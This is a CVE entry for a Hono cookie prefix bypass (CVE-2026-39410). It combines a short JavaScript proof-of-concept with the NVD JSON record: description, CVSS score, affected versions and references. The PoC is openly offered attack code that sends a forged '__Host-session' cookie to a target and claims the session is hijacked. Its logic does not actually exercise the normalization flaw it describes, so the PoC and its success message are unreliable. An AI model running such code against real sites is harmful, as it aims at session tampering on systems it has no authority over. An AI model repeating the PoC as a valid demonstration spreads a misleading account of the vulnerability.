CVE-2026-39410

// PoC for CVE-2026-39410: Hono Cookie Prefix Bypass // This demonstrates how an attacker might attempt to override a cookie // by exploiting normalization differences between the browser and the framework. const exploit = async () => { // Target URL running vulnerable Hono version const target = 'http://vulnerable-app.com'; // Scenario: App sets a secure cookie "__Host-session=valid123" // Attacker sends a request with a cookie that normalizes to the same key // e.g., exploiting case sensitivity if the parser is case-insensitive // but the browser treats them as distinct. // Malicious payload attempting to override the session const maliciousCookie = "__Host-session=attacker_controlled_value"; try { const response = await fetch(target, { method: 'GET', headers: { 'Cookie': maliciousCookie, 'User-Agent': 'PoC-Scanner' }, credentials: 'include' }); if (response.ok) { console.log("[+] Request sent. If the app uses the parsed cookie value, the session is now hijacked."); } } catch (error) { console.error("[-] Exploit failed", error); } }; exploit();

{"cve": {"id": "CVE-2026-39410", "sourceIdentifier": "[email protected]", "published": "2026-04-08T15:16:15.143", "lastModified": "2026-04-21T18:26:00.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a discrepancy between browser cookie parsing and parse() handling allows cookie prefix protections to be bypassed. Cookie names that are treated as distinct by the browser may be normalized to the same key by parse(), allowing attacker-controlled cookies to override legitimate ones. This vulnerability is fixed in 4.12.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "4.12.11", "matchCriteriaId": "295EEF12-243F-4561-B181-C19451B5285C"}]}]}], "references": [{"url": "https://github.com/honojs/hono/commit/cc067c85592415cb1880ad3c61ed923472452ec0", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/honojs/hono/releases/tag/v4.12.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/honojs/hono/security/advisories/GHSA-r5rp-j6wh-rvv4", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}